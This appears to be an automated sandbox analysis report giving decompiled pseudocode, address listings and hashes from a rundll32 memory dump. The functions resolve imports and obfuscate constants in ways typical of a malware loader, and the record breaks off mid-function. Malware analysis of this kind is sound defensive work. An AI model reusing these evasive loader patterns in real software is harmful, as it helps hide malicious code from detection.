0x0034af7d
0x0034af80
0x0034af84
0x0034af8c
0x0034af94
0x0034afa4
0x0034afad
0x0034afb0
0x0034afb4
0x0034afbc
0x0034afc4
0x0034afc9
0x0034afd9
0x0034afdd
0x0034afe5
0x0034afed
0x0034aff5
0x0034affe
0x0034b001
0x0034b005
0x0034b00d
0x0034b015
0x0034b01d
0x0034b025
0x0034b02d
0x0034b035
0x0034b03a
0x0034b042
0x0034b04a
0x0034b054
0x0034b058
0x0034b060
0x0034b06d
0x0034b071
0x0034b076
0x0034b083
0x0034b08b
0x0034b093
0x0034b09b
0x0034b09b
0x0034b0a5
0x0034b101
0x00000000
0x0034b0a7
0x0034b0ad
0x00000000
0x0034b0b3
0x0034b0bc
0x0034b0e3
0x0034b0f4
0x0034b0f4
0x0034b0ad
0x0034b0f8
0x0034b100
0x0034b100
0x0034b105
0x0034b11b
0x0034b120
0x0034b125
0x0034b131
0x00000000
0x0034b127
0x0034b127
0x00000000
0x0034b127
0x00000000
0x0034b136
0x0034b136
0x00000000

Strings

_`, xrefs: 0034AF1C
#@Z, xrefs: 0034AF6B

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #@Z$_`
API String ID: 0-2586238014
Opcode ID: 4ba60cf09433a50d5b9ca333cdf205b18dfe2e2d6cdffe16d299b72e654bce16
Instruction ID: 933cd3a42cf386dc7f861f882034255cf86b8c0009be7561e18de84e2328c81e
Opcode Fuzzy Hash: 4ba60cf09433a50d5b9ca333cdf205b18dfe2e2d6cdffe16d299b72e654bce16
Instruction Fuzzy Hash: A65125711083009FC719CF22C88681BFBE5FBD8758F549A1DF5969A260C372DA49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0034DFF3 Relevance: 2.6, Strings: 2, Instructions: 135
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0034DFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x363e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E003446BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E003481B7, _v28);
							_t135 =  *0x363e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E00347AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x363e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E00347FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x363e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}

0x0034dff3
0x0034dff6
0x0034e000
0x0034e008
0x0034e010
0x0034e018
0x0034e020
0x0034e028
0x0034e030
0x0034e038
0x0034e049
0x0034e052
0x0034e05a
0x0034e05c
0x0034e069
0x0034e076
0x0034e07b
0x0034e083
0x0034e092
0x0034e095
0x0034e099
0x0034e0a1
0x0034e0a9
0x0034e0b1
0x0034e0b9
0x0034e0c1
0x0034e0d1
0x0034e0d5
0x0034e0da
0x0034e0e2
0x0034e0ea
0x0034e0f6
0x0034e0f9
0x0034e0fd
0x0034e105
0x0034e10d
0x0034e112
0x0034e11a
0x0034e122
0x0034e12a
0x0034e132
0x0034e137
0x0034e13f
0x0034e147
0x0034e14f
0x0034e154
0x0034e15c
0x0034e164
0x0034e16e
0x0034e177
0x0034e17b
0x0034e183
0x0034e18b
0x0034e195
0x0034e199
0x0034e1a1
0x0034e1a7
0x0034e1a7
0x0034e1ad
0x0034e229
0x0034e22e
0x0034e237
0x0034e1af
0x0034e1b1
0x00000000
0x0034e1b3
0x0034e1c6
0x0034e1cb
0x0034e1d1
0x0034e1d4
0x0034e1d6
0x00000000
0x0034e1d6
0x0034e1b1
0x0034e23b
0x0034e248
0x0034e248
0x0034e1e7
0x0034e1e8
0x0034e1eb
0x0034e1f3
0x0034e1f5
0x0034e1f7
0x0034e1fd
0x0034e1fd
0x00000000

Strings

(F, xrefs: 0034E183
", xrefs: 0034E018

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (F$"
API String ID: 0-1034852068
Opcode ID: 8e1ff2bd588bc2f2fa42cefc5ad160b5199a8e9ba58d713ecb921a5d24f28723
Instruction ID: 5db2ebfd0e56f0fb7b8c1ee38230830e1535443b1f6dd4280a1564ea557b8a06
Opcode Fuzzy Hash: 8e1ff2bd588bc2f2fa42cefc5ad160b5199a8e9ba58d713ecb921a5d24f28723
Instruction Fuzzy Hash: D35143725093019FC359CF25DA8A80FBBE1FB84758F10891DF595AA260D3B1EA09CF97

Uniqueness

Uniqueness Score: -1.00%

Function 00347C37 Relevance: 2.6, Strings: 2, Instructions: 122
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00347C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E003520B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E0035CADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E00346CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}

0x00347c3c
0x00347c42
0x00347c43
0x00347c47
0x00347c4b
0x00347c4c
0x00347c4d
0x00347c52
0x00347c5a
0x00347c5d
0x00347c6e
0x00347c71
0x00347c75
0x00347c7d
0x00347c8d
0x00347c91
0x00347c99
0x00347ca1
0x00347ca9
0x00347cb1
0x00347cb9
0x00347cc1
0x00347ccd
0x00347cd0
0x00347cd4
0x00347ce1
0x00347ce5
0x00347ced
0x00347cf5
0x00347cfa
0x00347d02
0x00347d0a
0x00347d12
0x00347d17
0x00347d1f
0x00347d27
0x00347d31
0x00347d35
0x00347d3d
0x00347d4a
0x00347d4e
0x00347d56
0x00347d5b
0x00347d66
0x00347d6a
0x00347d6c
0x00347d72
0x00347df1
0x00000000
0x00347d7b
0x00347d7b
0x00347dea
0x00347dea
0x00347def
0x00000000
0x00000000
0x00347d96
0x00347d98
0x00347d9c
0x00347d9e
0x00347dfc
0x00000000
0x00347dfc
0x00347da5
0x00347da7
0x00347de1
0x00347de1
0x00347de3
0x00347de5
0x00000000
0x00000000
0x00347dab
0x00347db5
0x00347db5
0x00347dad
0x00347dad
0x00347dad
0x00347dc9
0x00347dce
0x00347dd1
0x00347dd3
0x00000000
0x00347dd5
0x00347dd5
0x00347dd9
0x00347ddc
0x00347dde
0x00347dde
0x00000000
0x00347dde
0x00347dd3
0x00347de7
0x00347de7
0x00347de7
0x00000000
0x00347dea

Strings

X^wE, xrefs: 00347CB9
c`, xrefs: 00347CED

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: X^wE$c`
API String ID: 0-1321574684
Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
Instruction ID: 2b3dd5e29a44f4a5f87dd3b4d5eaadfeb5cfa4f671174e6e1e62470e721ccfd9
Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
Instruction Fuzzy Hash: D25185719083029FC719DF24D88692BBBE1FFC5358F11481DF4869A221E371EA49CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00356C49 Relevance: 2.6, Strings: 2, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00356C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E00349D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E00356637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E00344B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}

0x00356c55
0x00356c58
0x00356c5b
0x00356c5e
0x00356c5f
0x00356c60
0x00356c65
0x00356c6e
0x00356c75
0x00356c78
0x00356c7f
0x00356c81
0x00356c8d
0x00356c99
0x00356ca4
0x00356ca7
0x00356cae
0x00356cb5
0x00356cb8
0x00356cbf
0x00356cc6
0x00356ccd
0x00356cd1
0x00356cd8
0x00356cdf
0x00356ce3
0x00356cea
0x00356cf1
0x00356cf8
0x00356cff
0x00356d06
0x00356d0d
0x00356d14
0x00356d18
0x00356d1f
0x00356d26
0x00356d2d
0x00356d34
0x00356d3b
0x00356d42
0x00356d49
0x00356d4d
0x00356d54
0x00356d5b
0x00356d63
0x00356d66
0x00356d6d
0x00356d74
0x00356d7b
0x00356d7f
0x00356d86
0x00356d86
0x00356d8c
0x00356dcd
0x00356dd2
0x00356dd5
0x00000000
0x00356dd5
0x00356d90
0x00000000
0x00000000
0x00000000
0x00356db0
0x00356de5
0x00356dec
0x00356dee
0x00356dee
0x00000000

Strings

%t, xrefs: 00356D3B
DL&, xrefs: 00356C88

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %t$DL&
API String ID: 0-1839930247
Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
Instruction ID: e4dd9f42125b94059cd0c13e124b0d239785c402bb784a9d6e12a155f00646cc
Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
Instruction Fuzzy Hash: 13412471D0020DEBCF1ADFE1D94A8EEBBB1FB48318F608098D51176260D7B54A59CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00344C5D Relevance: 2.6, Strings: 2, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E00344C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E00358606(_v16, 0x341378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E0034CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E0034A8B0(_v36, _t130, _v32);
				}
				return 0;
			}

0x00344c63
0x00344c69
0x00344c70
0x00344c77
0x00344c7e
0x00344c82
0x00344c86
0x00344c8d
0x00344c94
0x00344c9b
0x00344ca8
0x00344cad
0x00344cb2
0x00344cb9
0x00344cc4
0x00344cc7
0x00344cca
0x00344ccd
0x00344cd1
0x00344cd8
0x00344cdf
0x00344ce3
0x00344cea
0x00344cf1
0x00344cf8
0x00344cff
0x00344d03
0x00344d0a
0x00344d11
0x00344d1d
0x00344d1e
0x00344d23
0x00344d2a
0x00344d31
0x00344d38
0x00344d3f
0x00344d46
0x00344d4d
0x00344d5c
0x00344d64
0x00344d67
0x00344d6e
0x00344d75
0x00344d79
0x00344d80
0x00344d8a
0x00344d8d
0x00344d8f
0x00344d92
0x00344d9a
0x00344d9d
0x00344da3
0x00344da8
0x00344dab
0x00344dad
0x00344dae
0x00344db7
0x00344dc1
0x00344dc3
0x00344dc3
0x00344dcd
0x00344dd3
0x00344dda

Strings

<,:q, xrefs: 00344CE3
J~, xrefs: 00344D03

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <,:q$J~
API String ID: 0-951887683
Opcode ID: d624323edccee940d5c81c05c37d98e2f547cec7f778d4c270807904593a2804
Instruction ID: 1e72ca6b7877788b8422c63000aa1fe50b27097f560f7382afccd7c8f7210e25
Opcode Fuzzy Hash: d624323edccee940d5c81c05c37d98e2f547cec7f778d4c270807904593a2804
Instruction Fuzzy Hash: F7411F71D01309EBDF09CFA1C94AAEEBBB1FB54314F208159D410BA2A0D7B51B55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0034EE81 Relevance: 2.6, Strings: 2, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0034EE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E00358F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E0035DB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}

0x0034ee8a
0x0034ee96
0x0034ee99
0x0034ee9c
0x0034ee9f
0x0034eea6
0x0034eead
0x0034eeb4
0x0034eebb
0x0034eec2
0x0034eec9
0x0034eed0
0x0034eed7
0x0034eede
0x0034eee5
0x0034eef1
0x0034eef6
0x0034eefb
0x0034ef02
0x0034ef09
0x0034ef10
0x0034ef17
0x0034ef21
0x0034ef2a
0x0034ef2d
0x0034ef34
0x0034ef3b
0x0034ef48
0x0034ef4f
0x0034ef56
0x0034ef5d
0x0034ef64
0x0034ef6b
0x0034ef72
0x0034ef76
0x0034ef7d
0x0034ef84
0x0034ef8b
0x0034ef8f
0x0034efa0
0x0034efad
0x0034efaf
0x0034efbc
0x0034efbe
0x0034efc4
0x0034efca
0x00000000
0x00000000
0x0034efcc
0x00000000
0x0034efca
0x0034efce
0x0034efd0
0x0034efd0
0x0034efd4
0x0034eff2
0x0034eff7
0x0034f001

Strings

C>"h, xrefs: 0034EF4F
br8, xrefs: 0034EEB4

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C>"h$br8
API String ID: 0-573140060
Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
Instruction ID: 9829ebbae6333e5cdfff96af30a1520d98c0613261f9fda198f7c39cb6568fba
Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
Instruction Fuzzy Hash: ED41F271C0121DEBCF19CFE4C94A9EEBBB5FB08304F20819AE515B6260E3B45A59CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0035AA30 Relevance: 2.6, Strings: 2, Instructions: 67
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0035AA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

